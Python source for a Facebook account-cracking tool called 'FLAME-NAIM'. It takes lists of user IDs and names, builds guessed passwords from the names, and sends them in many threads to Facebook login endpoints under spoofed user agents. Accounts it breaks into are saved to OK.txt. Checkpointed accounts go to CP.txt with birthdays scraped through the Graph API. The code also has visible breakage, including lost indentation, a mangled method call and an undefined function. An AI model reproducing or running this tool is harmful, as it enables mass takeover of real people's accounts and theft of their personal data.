print(f"\033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m YOUR KEY : \033[1;33mADMIN")
print ("")
print ("")
print(" [1] START CRACK ")
print (" [2] FOLLOW ON FACEBOOK")
print (" [3] JOIN MY GROUP")
print (" [0] Exit Programing")
print (' ===============================================')
key = input(" [*] input : ")
print (' ===============================================')
if key in [""]:
print (" [!] please select correct option")
exit()
elif key in ["1", "01"]:
time.sleep(0.5)
__crack__().plerr()
elif key in ["2", "02"]:
time.sleep(0.5)
os.system('xdg-open https://www.facebook.com/Naim.Vau80')
elif key in ["3", "03"]:
time.sleep(0.5)
os.system('xdg-open https://www.facebook.com/Naim.Vau80')
os.system('clear')
elif key in ["0", "04"]:
time.sleep(0.5)
login()
ok = []
cp = []
id = []
user = []
num = 0
loop = 0
flame_naim = print
naim4 = open
Prof_naim = requests.get
_silet_koceng_ = requests.Session()
url_mb = "https://mbasic.facebook.com"
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
bulan_key = {"january": "January", "february": "February", "march": "March", "april": "April", "may": "May", "june": "June", "july": "July", "august": "August", "september": "September", "october": "October", "november": "November", "december": "December"}
header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}
ua_xiaomi = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_nokia = 'nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+'
ua_asus = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_huawei = 'Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_oppo = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_samsung = 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]'
ua_windows = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_realme = 'Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3'
user_agent=['Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.45 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/345.0.0.34.118;]','Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q710(FGN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36']
uas_bawaan = "Mozilla/5.0 (Linux; Android 12; SM-S906N Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/80.0.3987.119 Mobile Safari/537.36"
uas_nokiac2 = "NokiaC2-00/2.0 (03.45) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; kau; nokiac2-00) UCBrowser8.3.0.154/70/352/UCWEB Mobile"
uas_nokiax20 = "Mozilla/5.0 (Linux; Android 12; Nokia X20 Build/SKQ1.210821.001; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/98.0.4758.87 Mobile Safari/537.36"
uas_nokiax = "Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)"
uas_samsungse = "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"
uas_redmi9a = "Mozilla/5.0 (Linux; U; Android 10; id-id; Redmi 9A Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/89.0.4389.116 Mobile Safari/537.36"
uas_nokiaxl = "Mozilla/5.0 (Linux; Android 4.1.2; Nokia_XL Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 NokiaBrowser/1.2.0.12"
uas_chromelinux = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
uas_j7prime = "Mozilla/5.0 (Linux; Android 8.1.0; SM-G610F Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 OPR/51.1.2461.137501"
uas_tes1 = "Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4X Build/MiUI MS; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 Instagram 38.0.0.13.95 Android (24/7.0; 480dpi; 1080x1920; Xiaomi/xiaomi; Redmi Note 4X; mido; qcom; ru_RU; 99640911)"
uas_random = random.choice(["Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+","Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"])
uas_nokiac3 = "NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
uas_iphone = "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/13.3.1;FBSS/2;FBID/phone;FBLC/en_US;FBOP/5;FBCR/]"
uas_tes = "Mozilla/5.0 (Linux; Android 6.0.1; 12; en-us; 10; T-Mobile myTouch 3G Slide Build/GRI40)I148V)I223F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9980.0.4304.147 Mobile Safari/533.1 OPR/51.1.2461.137501"
uas_nokia5plus = "Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36"
uas_random2 = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36"])
P = '\x1b[1;97m' # PUTIH
M = '\033[0;91m' # MERAH
H = '\033[1;92m' # HIJAU
K = '\033[1;91m' # KUNING
B = '\033[0;94m' # BIRU
U = '\033[0;95m' # UNGU
O = '\033[0;96m' # BIRU MUDA
N = '\033[0m' # WARNA MATI
def login():
os.system("rm -rf access_token.txt");logo()
tok = input(' [*] Enter Your Token : ')
try:
u = requests.get('https://graph.facebook.com/me?access_token='+tok).text
u1 = json.loads(u)
name = u1['name']
ts = open('access_token.txt', 'w')
ts.write(tok)
ts.close()
print("\n\n[*] Login Successful as " + name )
time.sleep(1)
readline___Public_Xml()
except KeyError:
print('\n\n[*] Token Expired ')
time.sleep(1)
login()
def banner():
logo()
def hasil(ok,cp):
if len(ok) != 0 or len(cp) != 0:
flame_naim('\n\n\033[0m The Prosess Done...')
flame_naim('\n\033[1;92mTotal OK : %s • Total CP : %s'%(str(len(ok)),str(len(cp))));exit()
#flame_naim('\033[1;91mCHECK > %s'%(str(len(cp))));exit()
else:
flame_naim('\n\033[0mUps..Tidak Mendapatkan Hasil')
exit()
class __crack__:
def __init__(self):
self.id = []
def plerr(self):
try:
self.apk = input(" [*] File Name : ")
print (' [*]=============================================')
self.id = naim4(self.apk).read().splitlines()
flame_naim(' [*] Total ID : %s'%(len(self.id)))
print (' [✓] Are You Went To Continue : Type Y')
except:
flame_naim('\n [!] File Not Found In Storage')
input('\n [*] Press Enter To Back');readline___Public_Xml();print("[M] Menual Password ");print('[D] Default Password ')
_jokowi_kontol_ = input(" [*] Choose : ")
if _jokowi_kontol_ in ('M', 'm'):
print('[*] Function Added in new update ')
flame_naim('\nEnter Password 123456 or 123456789 For OLd Idz ')
while True:
pwek = input('\nEnter Password : ')
#flame_naim('Sandi > %s'%(pwek))
if pwek == '':
flame_naim('\nJangan Kosong')
time.sleep(1)
exit()
elif len(pwek)<=5:
flame_naim('\nSandi Harus 6 Karakter Lebih Tidak Masalah')
else:
def _sempak_(bse=None):
boy = input('\nPilih : ')
if boy == '':
flame_naim('\nJangan Kosong')
time.sleep(1);self._sempak_()
elif boy == "1" or boy == "01":
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=35) as (_ngentot_gratis_):
for ikeh in self.id:
try:
kimochi = ikeh.split('|')[0]
_ngentot_gratis_.submit(self.__api__, kimochi, bse)
except: pass
os.remove(self.apk)
hasil(ok,cp)
elif boy == "2" or boy == "02":
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=25) as (_ngentot_gratis_):
for ikeh in self.id:
try:
kimochi = ikeh.split('|')[0]
_ngentot_gratis_.submit(self.__mbasic__, kimochi, bse)
except: pass
os.remove(self.apk)
hasil(ok,cp)
elif boy == "3" or boy == "03":
flame_naim('\nHasil RESULTS Tersimpan Di > multiresuts.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=20) as (_ngentot_gratis_):
for ikeh in self.id:
try:
kimochi = ikeh.split('|')[0]
_ngentot_gratis_.submit(self.__mfb,__, kimochi, bse)
except: pass
os.remove(self.apk)
hasil(ok,cp)
else:
#flame_naim('\nSalah')
exit()
#flame_naim('\n\t PILIH METODE CRACK NYA')
flame_naim('\n01.) Metode b-api ')
flame_naim('02.) Metode mbasic ')
flame_naim('03.) Metode Mobile ')
_sempak_(pwek.split(','))
break
elif _jokowi_kontol_ in ('Y', 'y'):
print (' [*]=============================================')
flame_naim('\n\t------[ Method Crack ]-----')
print (' [*]=============================================')
flame_naim(' [1] METODE B-API')
flame_naim(' [2] METODE MBASIC [ Pro ]')
flame_naim(' [3] METODE MOBILE ')
print (' [*]=============================================')
self.__pler__()
else:
#flame_naim('\nLu kok kayak jmbt ya?')
exit()
return
def __api__(self, user, _sempak_):
global ok,cp,loop
sys.stdout.write('\r\033[1;97m[ FLAME-NAIM ] %s/%s \033[1;92mOK-:%s / \033[1;91mCP-:%s'%(loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in _sempak_:
pw = pw.lower()
try: os.mkdir('')
except: pass
try:
ua_vivo = naim4('agent.txt', 'r').read()
except (KeyError, IOError):
ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
p = Prof_naim("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+user+"&locale=en_US&password="+pw+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6").json()
if "access_token" in p:
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s%s '%(user,pw,tahun(user)))
wrt = '%s - %s %s'%(user,pw,tahun(user))
ok.append(wrt)
open('OK.txt','a').write('%s\n' % wrt)
break
continue
elif "www.facebook.com" in p["error_msg"]:
try:
token = naim4('login.txt').read()
cp_ttl = Prof_naim('https://graph.facebook.com/%s?access_token=%s'%(user,token)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
flame_naim('\r\033[1;91m[FLAME-NAIM-CP🔒] %s | %s • %s %s %s%s '%(user,pw,day,month,year,tahun(user)))
wrt = '%s - %s - %s %s %s%s'% (user,pw,day,month,year,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
flame_naim('\r\033[1;91m[FLAME-NAIM-CP🔒] %s | %s%s '%(user,pw,tahun(user)))
wrt = '%s - %s%s' % (user,pw,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
continue
loop += 1
def __mbasic__(self, user, _sempak_):
global ok,cp,loop
sys.stdout.write('\r\033[1;97m[ FLAME-NAIM ] %s/%s \033[1;92mOK-:%s / \033[1;91mCP-:%s '%(loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in _sempak_:
pw = pw.lower()
try: os.mkdir('')
except: pass
try:
ua_vivo = naim4('agent.txt', 'r').read()
except (KeyError, IOError):
ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
headers_ = {"Host":"mbasic.facebook.com","upgrade-insecure-requests":"1","user-agent":"NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
_headers = {"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://mbasic.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if 'c_user' in ses.cookies.get_dict():
flame_naim('\r\033[1;32m[FLAME-NAIM-OK💉] %s | %s ' % (user,pw))
wrt = '%s - %s' % (user,pw)
ok.append(wrt)
open('OK.txt','a').write('%s\n' % wrt)
break
continue
elif 'checkpoint' in ses.cookies.get_dict():
try:
token = naim4('token.txt').read()
cp_ttl = Prof_naim('https://graph.facebook.com/%s?access_token=%s'%(user,token)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
flame_naim('\r\033[1;31m[FLAME-NAIM-CP🔒] %s | %s • %s %s %s%s ' % (user,pw,day,month,year,tahun(user)))
wrt = '%s - %s - %s %s %s%s' % (user,pw,day,month,year,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
flame_naim('\r\033[1;91m[FLAME-NAIM-CP🔒] %s | %s%s ' % (user,pw,tahun(user)))
wrt = '%s - %s%s'%(user,pw,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
continue
loop += 1
def __mfb__(self, user, _sempak_):
global ok,cp,loop
sys.stdout.write('\r\033[1;97m[ FLAME-NAIM ] %s/%s \033[1;92mOK-:%s / \033[1;91mCP-:%s'%(loop,len(self.id),len(cp),len(ok))),
sys.stdout.flush()
for pw in _sempak_:
pw = pw.lower()
try: os.mkdir('')
except: pass
try:
user_agent = naim4('agent.txt', 'r').read()
except (KeyError, IOError):
user_agent=['Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.45 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/345.0.0.34.118;]','Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q710(FGN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36']
ses = requests.Session()
headers_ = {"Host":"m.facebook.com","upgrade-insecure-requests":"1","user-agent":ua_vivo,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
_headers = {"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://m.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://m.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if 'c_user' in ses.cookies.get_dict():
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s '%(user,pw))
wrt = '%s - %s - %s' % (user,pw)
ok.append(wrt)
open('OK.txt','a').write('%s\n' % wrt)
break
continue
elif 'checkpoint' in ses.cookies.get_dict():
try:
token = naim4('token.txt').read()
cp_ttl = Prof_Aking('https://graph.facebook.com/%s?access_token=%s'%(user,token)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s %s %s %s%s ' % (user,pw,day,month,year,tahun(user)))
wrt = '%s - %s - %s %s %s'%(user,pw,day,month,year)
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s%s ' % (user,pw,tahun(user)))
wrt = '%s - %s%s'%(user,pw,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
continue
loop += 1
def __pler__(self):
yan = input('\n[•] Choose : ')
if yan == '':
flame_naim('\nJangan Kosong')
exit()
elif yan in ('1', '01'):
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=35) as (_ngentot_gratis_):
for yntkts in self.id:
try:
uid, name = yntkts.split('|')
xz = name.split(' ')
if len(xz) == 1:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 2:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 3:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 4:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
else:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
_ngentot_gratis_.submit(self.__api__, uid, pwx)
except:
pass
os.remove(self.apk)
hasil(ok,cp)
elif yan in ('2', '02'):
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=25) as (_ngentot_gratis_):
for yntkts in self.id:
try:
uid, name = yntkts.split('|')
xz = name.split(' ')
if len(xz) == 1:
pwx = [name, xz[0]+xz[1]]
elif len(xz) == 2:
pwx = [name, xz[0]+xz[1]]
elif len(xz) == 3:
pwx = [name, xz[0]+xz[1]]
elif len(xz) == 4:
pwx = [name, xz[0]+xz[1]]
else:
pwx = [name, xz[0]+xz[1]]
_ngentot_gratis_.submit(self.__mbasic__, uid, pwx)
except:
pass
os.remove(self.apk)
hasil(ok,cp)
elif yan in ('3', '03'):
#flame_naim('\n[•] Result OK saved to OK.txt')
#flame_naim('[•] Result CP saved to CP.txt')
#flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
